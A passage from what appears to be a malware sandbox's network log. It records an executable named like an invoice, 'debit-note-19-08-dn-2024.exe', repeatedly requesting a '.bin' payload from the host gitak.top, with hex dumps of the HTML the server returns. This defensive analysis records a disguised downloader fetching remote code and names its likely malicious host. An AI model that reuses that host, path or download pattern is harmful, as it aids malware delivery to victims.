2024-08-26 13:33:38 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICXPpdxDEmIWQRt6Zh9W%2F30qgS3ru1eIDFfuyeYyBvZ6bfEBJ8JSma65lF59TeaqSWJJSlMLFmWEM4Xcc4szob9xqQsM0ikn8TzISf%2FAtfTr2mSHwNODbWU7S00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9431d90bd63b92-IAD
2024-08-26 13:33:38 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:38 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:33:38 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 56 6c 48 56 6b 72 30 49 35 4c 57 32 56 70 6a 5f 76 65 2e 4b 6a 52 46 64 5a 6a 45 63 70 5f 6f 47 65 4d 31 4e 5f 42 4b 6b 74 30 77 2d 31 37 32 34 36 37 39 32 31 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="VlHVkr0I5LW2Vpj_ve.KjRFdZjEcp_oGeM1N_BKkt0w-1724679218-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:33:38 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:33:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49826	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:48 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:33:48 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXlXM2vFo3Rr8EtU%2FG9YyQ%2Bl54WHFA3ZniT7DHDZHeOYZrQEIZf9QzKOSa11Kyg18G45s09pLrZ7ufd1cg0siKZDZ88TOIxSYokO5Ai9esmsHMj76uOeM0Td6OI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94321ad804200c-IAD
2024-08-26 13:33:48 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:48 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:33:48 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 35 4d 39 44 33 51 32 51 73 34 55 78 43 6d 32 71 56 37 4a 45 6c 7a 46 6d 64 59 32 50 36 34 44 68 4d 5a 4b 69 4f 39 4d 56 73 50 34 2d 31 37 32 34 36 37 39 32 32 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="5M9D3Q2Qs4UxCm2qV7JElzFmdY2P64DhMZKiO9MVsP4-1724679228-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:33:48 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:33:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49827	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:58 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:33:59 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Dr4eipM90yRhTz4glTbMKUP%2BBz41de16B%2F74VfA%2FvwI2q4M6j0ji94QqgHr2aJF%2FY3uUCM5xhKQ6kLC75ZRel4j22aFWefKm4fStOJQOtXAC8W9z48brtZF%2BSo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94325ca8da59fd-IAD
2024-08-26 13:33:59 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:59 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:33:59 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 46 4d 6e 35 35 69 41 65 37 71 72 51 77 66 73 39 43 63 75 77 41 66 48 6d 6f 70 36 68 2e 78 51 54 72 4d 45 71 44 72 46 4a 57 45 2d 31 37 32 34 36 37 39 32 33 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="SFMn55iAe7qrQwfs9CcuwAfHmop6h.xQTrMEqDrFJWE-1724679239-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:33:59 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:33:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49828	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:34:09 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:34:09 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jStPBOkm31F2dErQybvC3S3feBIQL%2B9xPOkPA6C3QvECveD9Dy1gbXf8X8Y7qGZOuO6qdZ85MuF%2BVM%2FBLoMmYMDjOvcCY8BgzOfqJqU%2BVPtCT%2Bz2DKB50Atpc0A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94329e3f303b38-IAD
2024-08-26 13:34:09 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:34:09 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:34:09 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 47 6d 49 46 4f 69 37 76 38 79 38 69 48 31 35 53 4a 35 64 36 31 50 41 36 4a 49 68 48 70 4c 4f 4e 62 78 5f 2e 73 34 6e 68 6f 56 55 2d 31 37 32 34 36 37 39 32 34 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="GmIFOi7v8y8iH15SJ5d61PA6JIhHpLONbx_.s4nhoVU-1724679249-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:34:09 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:34:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49829	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:34:19 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
